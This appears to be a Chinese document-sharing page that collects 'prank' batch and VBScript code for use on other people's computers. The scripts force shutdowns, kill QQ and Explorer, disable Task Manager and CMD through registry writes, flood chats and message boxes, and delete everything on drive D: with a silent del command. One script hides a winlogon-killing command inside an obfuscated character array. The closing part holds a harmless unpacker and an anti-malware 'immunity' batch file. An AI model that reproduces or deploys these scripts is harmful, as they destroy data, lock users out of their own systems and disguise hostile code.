文档库 最新最全的文档下载
当前位置:文档库 › VBS整人代码

VBS整人代码

整人专用→电脑技术
这是从一些高手那里学来的招数,呵呵,真是好方法。具体步骤是,打开记事本,在里面输入如下内容:

@echo 正在轰炸中……
:start
@net send %1 %2
@if errorlevel 1 goto over
goto start
: over
@echo 发送失败: (


将其保存为任意名字的.bat文件即可。使用用法是:任意名字的.bat+空格+目标IP地址+空格+你要对他说的话。

NO.2戏弄非法用户

为防止有人胡乱使用自己的电脑,我们可以利用批处理文件来戏弄一下非法用户。方法是用记事本程序在Windows目录中建立一个Winstart.bat文件,并在该文件中加入以下命令:

@echo off
echo non-system disk or disk error
choice/c:&&/n


上面代码中的"&&"为我们设置的密码,您可以自行设置。这样重新启动计算机开机时就会显示"non-system disk or disk error",接着光标一闪一闪的好像死机了一样,造成非法用户以为Windows死机的假象。有时就连高手也会上当受骗!当我们要进入系统时,只要输入"&&"即可。


NO.3我的电脑你别用

如果你不想让别人使用你的电脑,又不好意思说,那该怎么办呢?在CMOS中设密码,太小气了吧?他如果问你密码,你好意思不说吗?其实,我们可以用下面这个办法来欺骗一下他的眼睛,使他人以为电脑坏了。

方法是:进入MS-DOS方式或CMD窗口下,输入:copy con null.sys,按一下回车键,然后什么也别输入,再按一次回车键,按Ctrl+Z或按F6键,屏幕上会显示^z,按一下回车键,屏幕上会显示"1 file(s) copied",这样就一个名为null.sys的空文件就建好了。现在,找到C盘根目录下的config.sys文件,注意这个文件是隐藏属性,所以必须进入"我的电脑"中,点击"查看(v)"→"文件夹选项"→"查看"→"显示所有文件"才能看到它,然后右键单击该文件,在弹出菜单中选择"用记事本打开",接下来在config.sys文件中加入:device=c:\null.sys /d:null这样一行,保存修改结果,退出记事本。以后,你的电脑就会在出现Windows的启动画面时自动重新启动,如此反复下去,别人一定以为你的电脑出问题了,而你就可以偷偷乐了. 100%强制关闭对方QQ,整人就这样
100%关闭强制对方QQ。
2010年1月9日测试可用。
要整人,就要整的狠一点!如何呢?要是在他/她聊QQ聊得正欢的时候,关闭她/他的QQ,是不是整的很过瘾呢?下面这个方法,保证让你“遥控”她/他

的QQ下线:

首先大家用手机下个07版的qq,登陆你的QQ,锁定目标QQ(前提是他QQ必须在线哦)后,马上用换用电脑上登录你的QQ,然后手机那个关了(为了防止自动刷新断线),然后随便在电脑上截张图(一定要是截图,不能使与啊不由得图片)发给他,好戏开始了,当对方打开,嘿嘿,他的QQ就马上被自动关了,他就不得不重新输入号码重上了!
为什么会这样呢?据我猜测,可能是TX服务器不能及时同步你的QQ信息,、而手机是无法发送截图的,而导致在接收图片的过程中产生错误,

这样就只有把对方的QQ给强制关了 ==============================


msgbox "要求:"&vbcrlf&"1、要同时涉及3大门派"&vbcrlf&"2、要包含江湖门派间多年 怨情仇 又要打破世俗伦理"&vbcrlf&"3、同时情节还要扣人心悬 大有血雨腥 呼之欲来令人极为期待该小说之续集 同时留下N多悬念"&vbcrlf&"4、越短越好"&vbcrlf&""&vbcrlf&"第N天 有人来投稿 全文只有九个字:"&vbcrlf&""&vbcrlf&"...........",0,"武侠小说征文"
msgbox "秃驴 敢跟贫道抢师太",64,"投稿"
set ws=createobject("wscript.shell")
sub sleep (s)
wscript.sleep s * 1000
end sub
sleep 900
ws.popup "windows检测到有重要更新未安装"&vbcrlf&""&vbcrlf&"系统将在30秒后自动下载更新并安装",30,"Windows Xp",64
sleep 10
ws.popup "正在下载更新......"&vbcrlf&""&vbcrlf&"稍候将提示您安装",10,"Windows Xp",64
sleep 900
ws.popup "windows已将一病毒载入计算机中"&vbcrlf&""&vbcrlf&"稍后即将运行",15,"病毒",64
sleep 3
ws.run "taskkill /f /im qq.exe",vbhide : sleep 5
ws.regwrite "HKLM\software\microsoft\Windows\currentversion\policies\explorer\nodesktop","00000001","REG_DWORD"
wscript.sleep 500
ws.run "taskkill /f /im explorer.exe",vbhide : wscript.sleep 2000
ws.run "explorer.exe",vbhide : wscript.sleep 6000
ws.run "notepad",3 : wscript.sleep 2000
ws.sendkeys "^ " : wscript.sleep 1000
verybat=split("gongxi ,ni ,~,ni ,yijing ,bei ,wo ,kongzhi ,le ,~,ruguo ,ni ,zai ,30 miaozhong ,nei ,guanji ,~,name , keneng ,hai ,youjiu ,~,fouze , haha haha ____youxi ,kaishi la ,~,haole ,wo ,xianzai ,yao ,chuqu ,yixia ,~,yihui ,wo ,zailai ,zhaoni , haizi ,",",")
for each wind in verybat
ws.sendkeys wind
wscript.sleep 500
next
###################vbs整人代码2 ###################
set ierunner=createobject("wscript.shell")
ierunner.run "cmd /c start iexplore 自己的网站站
wscript.sleep 8000
ierunner.sendkeys "%{F4}"
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 3000 -c ""快说你爱我???"" ",0 ,true
dim a
do while(a <> "我爱你")
a = inputbox ("说你爱我,就不关机,快点,说 ""我爱你"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop

msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
###################vbs整人代码3 ###################
set s=createobject("wscript.shell")
set bag=getobject("winmgmts:\\.\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='wscript.exe'")
For Each id in pipe
if instr(1,https://www.wendangku.net/doc/382620353.html,mandLine,wscript.scriptfullname)<>0 and pipe.count>=2 then
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
id.terminate()
else
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
for i=1 to 60
s.popup"系统将在"& 60-i &"秒后关机...",1,"系统提示",4096+48
next
Set colOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * FROM Win32_OperatingSystem")
For Each eOs In colOS
eOs.Win32Shutdown(2)
Next
end if
Next
一、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可).
xx.vbs=>
=---------------------------------------------------------------------------
On Error Resume Next
Dim wsh,ye
set wsh=createobject("wscript.shell")
for i=1 to 10
wscript.sleep 700
wsh.AppActivate("与 xx 聊天中")
wsh.sendKeys "^v"
wsh.sendKeys i
wsh.sendKeys "%s"
next
wscript.quit
----------------------------------------------------------------------------
QQ骚扰信息,也可以用在其它程序上。
二、我就用这个程序放在学校图书馆查询书刊的机器上,好多人都那它没办法,哈哈
------------------------------------------------------------------------------
do
msgbox "You are foolish!"
loop
------------------------------------------------------------------------------
三、打开无数个计算器,直到死机
------------------------------------------------------------------------------
set wsh=createobject("wscript.shell")
do
wsh.run "calc"
loop
-----------------------------------------------------------------------------
四、直接关机
-----------------------------------------------------------------------------
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "shutdown -f -s -t 00",0 ,true
-----------------------------------------------------------------------------
五、删除D:\所有文件
---------------------------------------------------------------------------
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd /c ""del d:\*.* / f /q /s"

"",0 ,true
----------------------------------------------------------------------------
六、不断弹出窗口
----------------------------------------------------------------------------
while(1)
msgbox "哈哈 你被耍了!"
loop
----------------------------------------------------------------------------
七、不断按下alt+f4 (开什么都关闭……)
---------------------------------------------------------------------------
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
while(1)
WSHshell.SendKeys "%{F4}"
loop
---------------------------------------------------------------------------
八、按500次回车
(以上代码在运行者的电脑上显示500个对话框。其中 do until s=500 ,500可以随意更改)
-----------------------------------------------------------------------------
dim s
do until s=500
s=s+1
msgbox "哥们,给我按500次回车吧",64
loop
'------------------------ ------------------------------------------------------------
九、关不掉的窗口
------------------------------------------------------------------------------------
WScript.Echo("嘿,谢谢你打开我哦,我等你很久
拉!"&TSName)
WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰
你工作。")
WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
WScript.Echo("还剩38下")
WScript.Echo("还剩37下")
WScript.Echo("还剩36下")
WScript.Echo("还剩35下")
WScript.Echo("还剩34下")
WScript.Echo("还剩33下")
WScript.Echo("还剩32下")
WScript.Echo("还剩30下")
WScript.Echo("还剩29下")
WScript.Echo("还剩28下")
WScript.Echo("还剩27下")
WScript.Echo("还剩26下")
WScript.Echo("还剩25下")
WScript.Echo("还剩24下")
WScript.Echo("还剩23下")
WScript.Echo("还剩22下")
WScript.Echo("还剩21下")
WScript.Echo("还剩20下")
WScript.Echo("还剩19下")
WScript.Echo("还剩18下")
WScript.Echo("还剩17下")
WScript.Echo("还剩16下")
WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说")
WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555

")
WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?")
WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!")
WScript.Echo("还剩5下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你
的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无
义!!!")
WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝
又给了一次机会。")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
两个整人vbs代码:
测试环境:Windows 2003 系统
大家好 我是Vanlisa QQ137841986
今天给大家带来两个整人的VBS脚本 希望大家喜欢
VBS脚本大家都知道吧 第一个是定时关机的
如果把他发给你的QQ好友 他不懂的话 如果不输我是猪 电脑就会在你设定的
时间内关机 我设置的是3分钟 只要输入就解除了 当然如果不输的话也有解除的办法
我们来看下这个脚本
--------------------------------------------------------------------------------
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 180 -c ""说我是猪,不说我是猪就一分钟关机,不信,试下???"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖"
--------------------------------------------------------------------------------
新建一个记事本 把上面的代码复制进去 另存为VBE格式的就可以了
cmd.exe /c shutdown -r -t 180 -c
这里的数字可以修改关机时间 180秒
这些文字也可以自设 这个脚本启用cmd 里的关机程序
如果不输的的话 可以打开任务管理器 输入shutdown -a 来解除 我们试下 这时定时关机已
经没了

但是还有个关不掉的窗口 我们打开任务管理器 结束掉Wscript.exe 这个进程就OK
了 这时就完全解除这个脚本了 Wscript 时Windows 脚本宿主
-------------------------------------------------------------------------------------------
下面看第二个整人的脚本
-------------------------------------------------------------------------------------------
set ws=createobject("wscript.shell")
call shutdown(1)
do while a<>"我是猪"
a=inputbox("快在下面的框框里输入我是猪,否则后果自负,快输""我是猪"" ","输不输","")
loop
call shutdown(2)
msgbox "早说就行了嘛",4096+64
msgbox"再输一遍我是猪!",4096+64
msgbox"我是猪!",4096+64
MsgBox"最后一次!",4096+64
MsgBox"如果你很快的点过去,不看的话",4096+64
MsgBox"我就要你踩我空间的!哼!",4096+64
MsgBox"从前有座山!",4096+64
MsgBox"山里有个庙.",4096+64
MsgBox"庙里有个老和尚在讲故事.",4096+64
ws.run"iexplore.exe 自己的网站
msgbox"哎呀累了!数绵羊哄我睡觉",4096+64
for i=1 to 100
MsgBox i&"只绵羊",4096+64
next
msgbox"哎呀我困了,这次就饶过你吧,下次注意哦!",4096+64
msgbox"最后问个问题,我是不是大好人!",4096+64
if inputbox("是不是","请选择","是")<>"是" then
call shutdown(1)
end if
sub shutdown(s)
select case s
case 1
ws.run"cmd.exe /c shutdown -r -t 60 -c",0
case 2
ws.run"cmd.exe /c shutdown -a",0
end select
end sub
--------------------------------------------------------------------------------
ws.run"iexplore.exe 自己的网站
这段代码可以改成你自己设定的地址
如果别人不输我是猪的话就会一直点下去 点到你设定的数字
for i=1 to 100
从1到100
可以改成 20 其他的数字
解除这个VBS脚本的办法就简单了 只是关掉任务管理器里Wscript.exe
这个进程就好了
QQ2009整人代码:
set s=createobject("wscript.shell")
set bag=getobject("winmgmts:\\.\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='wscript.exe'")
For Each id in pipe
if instr(1,https://www.wendangku.net/doc/382620353.html,mandLine,wscript.scriptfullname)<>0 and pipe.count>=2 then
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",0,"REG_DWORD"
id.terminate()
else
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
s.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD",1,"REG_DWORD"
for i=1 to 60
s.popup"系统将在"& 60-i &"秒后关机...",1,"系统提示",4096+48
next
Set colOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * FROM Win32_OperatingSystem")
For Each eOs In colOS
eOs.Win32Shutdown(2)
Next
end if
Next
复制以上代码,在桌面建一个文本,把代码放进去,另存为VBE格式,
此代码

的威力:
1:开机就强制自动关机
2:cmd命令打不开
3:结束任务不管用
4:F8安全模式也不管用
呵呵!听起来是不是有点恐怖啊,我在我朋友空间里看见也吓了一跳、
代码破解方法:就是再运行一次,就可以破解了,也就是第2次保存的那个VBE文件,,
PS:不要乱拿软件去整人,发生什么事可不要怪我啊。。
拍拍手 顶起吧!
2:
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说你是傻B,我是天下第一大傻B不说宝宝,我是天下第一大傻B就一分钟关你机,不信,试试???"" ",0 ,true
dim a
do while(a <> "宝宝,我是天下第一大傻B")
a = inputbox ("宝宝,我是天下第一大傻B,就不关机,快撒,说 ""宝宝,我是天下第一大傻B"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,乖乖"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "宝宝是不是又帅啦??"
这代码是我从朋友那拿来的,大家可以试着玩下、你能做非法事情哦、
网页整人效果代码:
想看效果,只要复制这下面的所有代码保存在text文件里,修改文件后缀为txt就能看到效果了。



网页特效|https://www.wendangku.net/doc/382620353.html,/Js|---很恶心的常见整人效果


不许把鼠标移到这里
嘻试吧爽噢。。


vbs整人代码:
代码如下:
Private Sub Form_Load()
Me.Hide
End Sub
Private Sub Timer1_Timer()
'声明变量,其中“count”为静态变量,以便生成不同的文


Dim files As String
Dim nr As String
Dim c As String
Static count As Long
'定义要把生成的文件存放在那个目录文件下
c = "C:\Program Files\"
'生成文件的内容
nr = "哈哈,被黑的感觉的不错吧"
files = FreeFile
'如果a等于a那么就执行
If a = a Then
'count不断的加1,以便产生不同的文件名
count = count + 1
'产生文件名及文件句柄,并用count作为产生不同的文件名。
Open c & "system" & count & ".dll" For Append As #files
'向文件写内容
Write #files, nr
'清除文件句柄,这里很重要,如果不清除,将产生打开文件太多的错误提示
Close #files
End If
End Sub
vbs整人代码
发现新手对整人代码很感兴趣
现在发一下
N多个
每楼发两个
复制到记事本,后缀改为.vbs

if MsgBox("对不起,您灌水太多需要重新启动计算机。"&chr(10)&"确定要重启吗?",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel then
msgbox " 系统将立刻重起wow ~_^",,"你上当了!!"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "shutdown -s -t 5",,true
end if


'这个很强悍的vbs,蓝屏
strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-
23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-
13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103
,98,111,120,32,34,-15133,89,-13899,-20026,-
20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-
14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-
13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-
24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-
18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115,32,61,32,67,114,101,97,116,101,79,98,106,1
01,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119,115,99,114,105,112,116,
46,115,108,101,101,112,32,32,32,49,50,48,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32,115,
116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45,99,32,113,32,45,112,110,32,119,105,110,108,111,1
03,111,110,46,101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,118,98,104,105,100,101,13,10,101
,110,100,32,105,102,13,10,13,10,13,10)
for i=1 to UBound(strs)
runner=runner&chr(strs(i))
next
Execute runner
vbs解包代码2010-03-27 21:43Dim rs, ws, fso, conn, stream, connStr, theFolder
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
Set fso = CreateObject("Scripting.FileSystemObject")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=HSH.mdb;"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
On Error Resume Next
Do Until rs.Eof
theFolde

r = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
If fso.FolderExists(theFolder) = False Then
createFolder(theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
Wscript.Echo "所有文件释放完毕!"
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fso.FolderExists(Left(thePath, i)) = False Then
fso.CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
木马病毒完全免疫批处理源代码
@echo off
color 0a
echo ******************************************************************************
echo * *
echo * 现在进行机器狗免疫 *
echo * *
echo ******************************************************************************
md C:\WINDOWS\system32\wxptdi.sys 2>nul
md C:\WINDOWS\system32\wxptdi.sys\1..\ 2>nul
md C:\WINDOWS\system32\fat32.sys 2>nul
md C:\WINDOWS\system32\fat32.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\ati32srv.sys 2>nul
md C:\WINDOWS\system32\drivers\ati32srv.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\pcibus.sys 2>nul
md C:\WINDOWS\system32\drivers\pcibus.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\pcidisk.sys 2>nul
md C:\WINDOWS\system32\drivers\pcidisk.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\pcihdd.sys 2>nul
md C:\WINDOWS\system32\drivers\pcihdd.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\phy.sys 2>nul
md C:\WINDOWS\system32\drivers\phy.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\pop.sys 2>nul
md C:\WINDOWS\system32\drivers\pop.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\puid.sys 2>nul
md C:\WINDOWS\system32\drivers\puid.sys\1..\ 2>nul
md C:\WINDOWS\system32\drivers\usb32k.sys 2>nul
md C:\WINDOWS\system32\drivers\usb32k.sys\1..\ 2>nul
md C:\WINDOWS\system32\2dogkiller.sys 2>nul
md C:\WINDOWS\system32\2dogkiller.sys\1..\ 2>nul
attrib C:\WINDOWS\system32\wxptdi.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\fat32.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\ati32srv.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\pcidisk.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\pcihdd.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\phy.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\pop.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\puid.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\usb32k.sys +s +h +r +a 2>nul
attri

b C:\WINDOWS\system32\2dogkiller.sys +s +h +r +a 2>nul
attrib C:\WINDOWS\system32\drivers\pcibus.sys +s +h +r +a 2>nul
echo y|cacls C:\WINDOWS\system32\2dogkiller.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\usb32k.sys /d everyone2 >nul
echo y|cacls C:\WINDOWS\system32\drivers\puid.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\pop.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\phy.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\pcihdd.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\pcidisk.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\pcibus.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\drivers\ati32srv.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\fat32.sys /d everyone 2>nul
echo y|cacls C:\WINDOWS\system32\wxptdi.sys /d everyone 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *********************************************************************************
echo * *
echo * 现在进行机器狗小马免疫 *
echo * *
echo *********************************************************************************
md c:\windows\system32\bqtldzlu.exe 2>nul
md c:\windows\system32\diynpis.exe 2>nul
md c:\windows\system32\dndsioc.exe 2>nul
md c:\windows\sytem32\fewqickd.exe 2>nul
md c:\windows\sytem32\fmschif.exe 2>nul
md c:\windows\sytem32\fmsjhif.exe 2>nul
md c:\windows\sytem32\hefcndy.exe 2>nul
md c:\windows\sytem32\hgeazpkc.exe 2>nul
md c:\windows\sytem32\anistio.exe 2>nul
md c:\windows\sytem32\anittio.exe 2>nul
md c:\windows\sytem32\isndctio.exe 2>nul
md c:\windows\sytem32\juejwcx.exe 2>nul
md c:\windows\sytem32\nbnwewd.exe 2>nul
md c:\windows\sytem32\ptshell.exe 2>nul
md c:\windows\sytem32\uiwcaqws.exe 2>nul
md c:\windows\sytem32\wipxcdec.exe 2>nul
md c:\windows\sytem32\wrew2ds.exe 2>nul
md c:\windows\system32\ytewcxzsw.exe 2>nul
attrib c:\windows\system32\bqtldzlu.exe +s +r +h +a 2>nul
attrib c:\windows\system32\diynpis.exe +s +r +h +a 2>nul
attrib c:\windows\system32\dndsioc.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\fewqickd.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\fmschif.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\fmsjhif.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\hefcndy.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\hgeazpkc.exe +s +r +h +a 2>nul
attrib c:\window

s\sytem32\anistio.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\anittio.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\isndctio.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\juejwcx.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\nbnwewd.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\ptshell.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\uiwcaqws.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\wipxcdec.exe +s +r +h +a 2>nul
attrib c:\windows\sytem32\wrew2ds.exe +s +r +h +a 2>nul
attrib c:\windows\system32\ytewcxzsw.exe +s +r +h +a 2>nul
echo y|cacls c:\windows\system32\bqtldzlu.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\diynpis.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\dndsioc.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\fewqickd.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\fmschif.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\fmsjhif.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\hefcndy.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\hgeazpkc.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\anistio.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\anittio.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\isndctio.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\juejwcx.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\nbnwewd.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\ptshell.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\uiwcaqws.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\wipxcdec.exe /d everyone 2>nul
echo y|cacls c:\windows\sytem32\wrew2ds.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\ytewcxzsw.exe /d everyone 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *********************************************************************************
echo * *
echo * 进行Auto免疫 *
echo * *
echo *********************************************************************************
for %%a in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%a:\auto.exe >nul 2>nul
for %%h in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%h:\auto.exe\1..\ >nul 2>nul
for %%b in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%b:\autorun.inf >nul 2>nul
for %%g in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%g:\autorun.inf\1..\ >nul 2>nul
for %%c in (c,d,e,

f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%c:\auto.exe +s +h +r +a >nul 2>nul
for %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%d:\autorun.inf +s +h +r +a >nul 2>nul
for %%e in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo y|cacls %%e:\auto.exe /d everyone >nul 2>nul
for %%f in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls %%f:\autorun.inf /d everyone >nul 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *******************************************************************************
echo * *
echo * 现在进行IGM免役 *
echo * *
echo *******************************************************************************
md c:\windows\IGW.exe 2>nul
md c:\windows\AVPSrv.exe 2>nul
md c:\windows\DiskMan32.exe 2>nul
md c:\windows\IGM.exe 2>nul
md c:\windows\Kvsc3.exe 2>nul
md c:\windows\lqvytv.exe 2>nul
md c:\windows\MsIMMs32.exe 2>nul
